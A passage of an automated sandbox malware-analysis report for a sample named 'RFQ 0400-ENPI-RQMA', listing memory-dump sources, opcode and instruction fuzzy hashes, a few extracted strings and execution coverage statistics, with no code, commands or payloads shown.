                                                                                      • Instruction ID: cdddeb8244d0420e8d9d4e1e23c183792714cc80aa5a3d05ca4ee42c3369818f
                                                                                      • Opcode Fuzzy Hash: 3cca30b000a31158741bd5d88f5168ba45d24043b5428d33d6577d9535b41e31
                                                                                      • Instruction Fuzzy Hash: FBF05E72B042146FA7089A6EDC94CA7BBEDFBC9664355807AE548C7321DA319C0187A5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b62b060db8d27dfc804311b2d5ecc387aea28b237479a18da26bf7a01d99519f
                                                                                      • Instruction ID: 344dceb613f646a234764356b5628f535cd0e8d2d1bc1f319a6bf133199aba55
                                                                                      • Opcode Fuzzy Hash: b62b060db8d27dfc804311b2d5ecc387aea28b237479a18da26bf7a01d99519f
                                                                                      • Instruction Fuzzy Hash: 54010CF0901229DFEB15CF66C8087AABAF5EF05310F108169E819AA2A0D7745A42CF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 528421ea2d67c179a53167f82ae2fc54c7765f9b125693aad63717686e9004d1
                                                                                      • Instruction ID: 3d193b8bcce577c2c1756836aa99eae10cf933d89b73083352057825776a4246
                                                                                      • Opcode Fuzzy Hash: 528421ea2d67c179a53167f82ae2fc54c7765f9b125693aad63717686e9004d1
                                                                                      • Instruction Fuzzy Hash: 07F0BBB1605218AFEF09DF54DC4489B7FB9DF45110B1480EBE408C7361E7319E519795
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657152649.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_163d000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 81dcc384d618dd3eddc547f55109dcd37f816a28ab6a6748ce51935c76e0a43c
                                                                                      • Instruction ID: 989d4618946b943d4ce37be394c13114551c5f78b48952bdd40b4057047947d1
                                                                                      • Opcode Fuzzy Hash: 81dcc384d618dd3eddc547f55109dcd37f816a28ab6a6748ce51935c76e0a43c
                                                                                      • Instruction Fuzzy Hash: 88F062714043849AE7118E1ACD88B62FFA8EF91734F18C55AED084A396C3799844CAB1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 94357d8327cd5edf07c8f5c23f1f9f769caf63d60ff3381c6533d873fb4a17c4
                                                                                      • Instruction ID: 907e1b9985166eed70d89085a7a13d18e9225a8b02a1a9ec4755bad7798a7ce1
                                                                                      • Opcode Fuzzy Hash: 94357d8327cd5edf07c8f5c23f1f9f769caf63d60ff3381c6533d873fb4a17c4
                                                                                      • Instruction Fuzzy Hash: 06016674A01208AFDB44DFA9D588A9DFFF2EF88310F05C195A8089B365D7359951DF41
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6c0476ba11823ccbc06b15d25b7636a7d83dd777b2aea4745c365a4f7a3fcf01
                                                                                      • Instruction ID: b03dc2f8a7c40761b4746b69092f90e17ae4a2722d8f14c61a3d4cd1c8f5ba5d
                                                                                      • Opcode Fuzzy Hash: 6c0476ba11823ccbc06b15d25b7636a7d83dd777b2aea4745c365a4f7a3fcf01
                                                                                      • Instruction Fuzzy Hash: 1C01ECF0901229DFEB14DF56C4087EE7AF1EF45350F108165E41CAA1A0D7745A41DF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b323fb51de5895a93402b59951322bd970fb2ef60f3035d9ae2dfd11efcecd86
                                                                                      • Instruction ID: ade74f0b978f6fd3833689ea6905383262262899a8f50dc811afa2425c791641
                                                                                      • Opcode Fuzzy Hash: b323fb51de5895a93402b59951322bd970fb2ef60f3035d9ae2dfd11efcecd86
                                                                                      • Instruction Fuzzy Hash: F6E0C9767041286F93149A6EDC94D6BBBEEFBCD664355817AE508C7310DA319C0186A4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db09a88c1dc3f014df5873dc0a63104b690e5361d36aab4eb12ee5d1594fd024
                                                                                      • Instruction ID: fc2a1776074cce5edc590489ff537cb59145ab927b54be2d80e663817b8d37cd
                                                                                      • Opcode Fuzzy Hash: db09a88c1dc3f014df5873dc0a63104b690e5361d36aab4eb12ee5d1594fd024
                                                                                      • Instruction Fuzzy Hash: 82F0DAB0D4421A9FDB44DFA9C845AAFBFF4FB48200F1085A9DA19E7200D77595468BA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: T+-q$[V~*$[V~*$]\`
                                                                                      • API String ID: 0-1849991408
                                                                                      • Opcode ID: a6251f9a45f5dec353fe3bc3dacbb8eb2acd991884b667da56ad064ae487e084
                                                                                      • Instruction ID: a56c7d2461e3e9fc11f36358fce5c62012d85ef8edb22ca5d2cf7ed27e07fc8f
                                                                                      • Opcode Fuzzy Hash: a6251f9a45f5dec353fe3bc3dacbb8eb2acd991884b667da56ad064ae487e084
                                                                                      • Instruction Fuzzy Hash: ECB1D8B0E1A619DBDB04CFAAD58089EFBF2FF89300F14D55AD419AB218D7309942CF64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: T+-q$[V~*$]\`
                                                                                      • API String ID: 0-3978741314
                                                                                      • Opcode ID: a77bdff375595409cd132658ef271bc7af302a8f78a0b78a37a5266f3275910b
                                                                                      • Instruction ID: b9c6ec86cd7504c8d37343416268597ad46f01171b880502274712ad5a96942c
                                                                                      • Opcode Fuzzy Hash: a77bdff375595409cd132658ef271bc7af302a8f78a0b78a37a5266f3275910b
                                                                                      • Instruction Fuzzy Hash: 9DB1EAB0E15219DBDB04CFAAD58049EFBF2FF89300F14D55AD419AB219D7349942CF64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: T+-q$[V~*$]\`
                                                                                      • API String ID: 0-3978741314
                                                                                      • Opcode ID: b0bd7913c0f7aaae681f27eb47d59b5e55878e19ba15f86cb1c7cc8414b4a696
                                                                                      • Instruction ID: a47716d16fdc2f77d5c2fcdea0a0efac1ecccd574a1802475ff44d4347366ee1
                                                                                      • Opcode Fuzzy Hash: b0bd7913c0f7aaae681f27eb47d59b5e55878e19ba15f86cb1c7cc8414b4a696
                                                                                      • Instruction Fuzzy Hash: 00811AB4E1A229DBDB04CFA9D98089EFBB2FF99300F149956D419F7219D3309902DF64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 7Z/t$RWIK$[[bb
                                                                                      • API String ID: 0-1157992699
                                                                                      • Opcode ID: 831baa1fe7ed578596b9e409370eb5f236c7882c2323ca0a93695ebe7f92f975
                                                                                      • Instruction ID: 94558afae0d886daf36a77812d704d98b6df02596a1a70a16810c6d015f7f2bf
                                                                                      • Opcode Fuzzy Hash: 831baa1fe7ed578596b9e409370eb5f236c7882c2323ca0a93695ebe7f92f975
                                                                                      • Instruction Fuzzy Hash: 0B6129B0E152199FDB08CFAAC4415AEFFF2EF89300F14D06AD419A7254D7388A428F94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: s,M;
                                                                                      • API String ID: 0-2638591878
                                                                                      • Opcode ID: 4f8d37576c076227f5d6815d321fbcff0a73bc8261af895ef99461aef761895c
                                                                                      • Instruction ID: 4fcd6eb1081fc26ea2e98903ff4f49064ecf1f5e555df8e0f82db94c89e09af2
                                                                                      • Opcode Fuzzy Hash: 4f8d37576c076227f5d6815d321fbcff0a73bc8261af895ef99461aef761895c
                                                                                      • Instruction Fuzzy Hash: 58E105B4E012198FCB14DFA9D5849AEFBB2FF89305F24C169E415AB316DB30A941CF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0
                                                                                      • API String ID: 0-4108050209
                                                                                      • Opcode ID: 59ac94bd8f889dfa0c99ce751ff95077c31b27fd4dd807b3b54f86ee1bde482c
                                                                                      • Instruction ID: 12af42d57fde7859f551b545359a0ed64fa96b649a71db518142ead06611d8da
                                                                                      • Opcode Fuzzy Hash: 59ac94bd8f889dfa0c99ce751ff95077c31b27fd4dd807b3b54f86ee1bde482c
                                                                                      • Instruction Fuzzy Hash: A731EFB1E056189BEB58CFABD8506DEFBF3BFC8200F14C0BAD408A6214DB344A468F51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b83fa69afe376ba810ba0581a6491f7851e4693202d2481b6e7744fb48a87044
                                                                                      • Instruction ID: af0cf25f773eb92d317709ebda1045751e0cde5fb771fbbd841d4c20f6834908
                                                                                      • Opcode Fuzzy Hash: b83fa69afe376ba810ba0581a6491f7851e4693202d2481b6e7744fb48a87044
                                                                                      • Instruction Fuzzy Hash: 32E129B4E011598FCB14DFA9D5849AEFBB2FF89304F24C169D418AB356DB30A941CF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 074974dfed825b241c09bf18fa1c347d59b829f028d21bd3e865cea1e0353167
                                                                                      • Instruction ID: 4a8275b15ad4d9fcb3bc59f851b98744284f58574dae1bf86762646e0c540e53
                                                                                      • Opcode Fuzzy Hash: 074974dfed825b241c09bf18fa1c347d59b829f028d21bd3e865cea1e0353167
                                                                                      • Instruction Fuzzy Hash: C0E126B4E0015A8FDB14DFA9D5849AEFBB2FF89304F24C169E414AB356DB30A941CF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d9e85fc37bfa8b511681099e98e4e0c8550eb037ba86d75adb5980df23d63f66
                                                                                      • Instruction ID: a562ab528a6eb5d762856263ecf848b883708022dda9bb2cf1c59227b883a040
                                                                                      • Opcode Fuzzy Hash: d9e85fc37bfa8b511681099e98e4e0c8550eb037ba86d75adb5980df23d63f66
                                                                                      • Instruction Fuzzy Hash: 94E116B4E001598FDB14DFA9C9849AEFBB2FF89305F24C169D418AB356DB30A941CF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 50e5d175c566ad8648eb49ab6a832c4b81d05678557643b27e46e61cb65de82f
                                                                                      • Instruction ID: bbfcc47965b3ea137a77ce5b66e4ab5d00653bd517fef2c615dd499f82f6b707
                                                                                      • Opcode Fuzzy Hash: 50e5d175c566ad8648eb49ab6a832c4b81d05678557643b27e46e61cb65de82f
                                                                                      • Instruction Fuzzy Hash: 7BE117B4E001198FDB14DFA9D5849AEFBB2FF89304F24C169E414AB356DB30A941CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cca014e59ebfa9275a2eb4774a8e2a67d3ea77fcb74c4ec4764e03d13ef5ab83
                                                                                      • Instruction ID: 33e1a3f956cb171d002246f3ad4fc157a3b396de3721c0d5c20a1d9d0c6fc04e
                                                                                      • Opcode Fuzzy Hash: cca014e59ebfa9275a2eb4774a8e2a67d3ea77fcb74c4ec4764e03d13ef5ab83
                                                                                      • Instruction Fuzzy Hash: 09D1E831D2075A9ECB00EB68D994A99F771FF95300F6087AAD00977251FB706AC9CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b7f57daee2bcd3e1b1dcadb82b440fe1ea5a934d669f7b94ab090fe80dc97400
                                                                                      • Instruction ID: d330e605b7b0a7ad027f649e14d29d357f7642e0d528cd511be771e123c5a9d7
                                                                                      • Opcode Fuzzy Hash: b7f57daee2bcd3e1b1dcadb82b440fe1ea5a934d669f7b94ab090fe80dc97400
                                                                                      • Instruction Fuzzy Hash: 58D1D731D2075A9ACB10EB68D994A9DF771FFA5300F6087AAD00977250FB706AC9CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b1de9b769d34881435e7fe236d302f74c9c93079a106ec7c4edd2a60e02089db
                                                                                      • Instruction ID: 86087b623dc73f3e893194929ddb56cfb226ab00b1e5602e5f77ffcff644fa97
                                                                                      • Opcode Fuzzy Hash: b1de9b769d34881435e7fe236d302f74c9c93079a106ec7c4edd2a60e02089db
                                                                                      • Instruction Fuzzy Hash: D5A16132E002098FCF15DFB5C84459EBBB2FF85300B5585AAE905AB255DB71ED55CF40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e67d94146e23320a754907a646a6cd50d18d80182c7318e532e830a0f17383db
                                                                                      • Instruction ID: 3b40ab6c3fa02dcf3cdecf0e8a5911091f434c99e16c552dd9369afd777b8778
                                                                                      • Opcode Fuzzy Hash: e67d94146e23320a754907a646a6cd50d18d80182c7318e532e830a0f17383db
                                                                                      • Instruction Fuzzy Hash: 43D1F931E2075A9ECB00EB68D954A9DF771FF95300F6087AAD0097B251EB706AC5CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e2e5217390012daecd737507f4b4dccd4e352f40ff6190bbdc0fbd94ae5f402
                                                                                      • Instruction ID: 6665788a5b34ca41a8909ea36acef0dc904204998c7ee74438c02f9c3badedcb
                                                                                      • Opcode Fuzzy Hash: 3e2e5217390012daecd737507f4b4dccd4e352f40ff6190bbdc0fbd94ae5f402
                                                                                      • Instruction Fuzzy Hash: 3481F1B4E15219CFCB54CF99C58599EFBF2FF89210F24959AE419AB320D330AA52CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 73674f166e9614b4e000cdaa4fe20dea30d52151296f6fb474d65dff03730f8e
                                                                                      • Instruction ID: b73e255ec4163a0823cb11a18fe999ced634ec33efd97274b5a79996b3465027
                                                                                      • Opcode Fuzzy Hash: 73674f166e9614b4e000cdaa4fe20dea30d52151296f6fb474d65dff03730f8e
                                                                                      • Instruction Fuzzy Hash: 0E7144B5E1621A9FDB04CF99D4809EEFBF2FB89310F10806AD405AB314C3389A42DF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 608e96fe313132b2d9c3489ed367ceb518ef9e28a7574a69788df7be0714083f
                                                                                      • Instruction ID: 5ca96354b98158a92b657d78af73df10be0e371dfad9c77dfd966c43a61aaf39
                                                                                      • Opcode Fuzzy Hash: 608e96fe313132b2d9c3489ed367ceb518ef9e28a7574a69788df7be0714083f
                                                                                      • Instruction Fuzzy Hash: 176136B0B16A4DFFD710DFA1E286159BFB2FBC9301F6094D6C08997154DB3582A2DB09
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c3588948f662c01e7016bd0561a25058e153a6c95b04adcbc561882ad4cc6414
                                                                                      • Instruction ID: 9f6749fb1335b0c53d4ae14298cfe53c7c2736e46b6de6561620ab10b95389c6
                                                                                      • Opcode Fuzzy Hash: c3588948f662c01e7016bd0561a25058e153a6c95b04adcbc561882ad4cc6414
                                                                                      • Instruction Fuzzy Hash: 3D6108B0E1521ADFDF04CF99C5819EEFBB2BF89304F24859AD419AB304D7349A429F91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 63e9c766aaeeacb3f7a96008ace46c0f33193f4237b4ef9234218563826c0725
                                                                                      • Instruction ID: 793049602c788cbabb5e974455cf30bbb8a38249495720841fa65ba473a413d9
                                                                                      • Opcode Fuzzy Hash: 63e9c766aaeeacb3f7a96008ace46c0f33193f4237b4ef9234218563826c0725
                                                                                      • Instruction Fuzzy Hash: D05158B0E1621ADFDB04CFA6D4415EEBBF2FF89310F10942AE409B7254D7345A428F94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0aa4987ff6887a3753d43e96b9c5722450f547e017c4db2087159cfeb413887a
                                                                                      • Instruction ID: 0c6c9858f55f15c01217c02123280d825df55734d1f324c5f73e1536b0388696
                                                                                      • Opcode Fuzzy Hash: 0aa4987ff6887a3753d43e96b9c5722450f547e017c4db2087159cfeb413887a
                                                                                      • Instruction Fuzzy Hash: 975128B0E0125A8FDB54DFA9D9845AEFBF2BF89304F24C16AD418A7316D7309941CF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6249b1e2172dbd03f3a341e0e766ede10be36c82427db2f8401005a6c8b8c15a
                                                                                      • Instruction ID: 7927039e4ac9854a651aa57f098b00c55207472933d91a366bfe7adc6d11254e
                                                                                      • Opcode Fuzzy Hash: 6249b1e2172dbd03f3a341e0e766ede10be36c82427db2f8401005a6c8b8c15a
                                                                                      • Instruction Fuzzy Hash: FD4107B0E0121ADBDB04DFAAC4805EEFBF2FF88304F10D56AD819A7614D7349A429F54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 446d9c87957c4044ca4455a12b56f46c055e97c9496d891bd9f261b675e6940d
                                                                                      • Instruction ID: 6f229ce5f7f0f0508c9d959e9dc05017d622edef92564b30458455dbfd111335
                                                                                      • Opcode Fuzzy Hash: 446d9c87957c4044ca4455a12b56f46c055e97c9496d891bd9f261b675e6940d
                                                                                      • Instruction Fuzzy Hash: 62C04CA5AED104E786402ED4B6040F8F73CD68F276F213051D28FA60018620C3554545
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:1.4%
                                                                                      Dynamic/Decrypted Code Coverage:4.8%
                                                                                      Signature Coverage:7.5%
                                                                                      Total number of Nodes:146
                                                                                      Total number of Limit Nodes:12

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
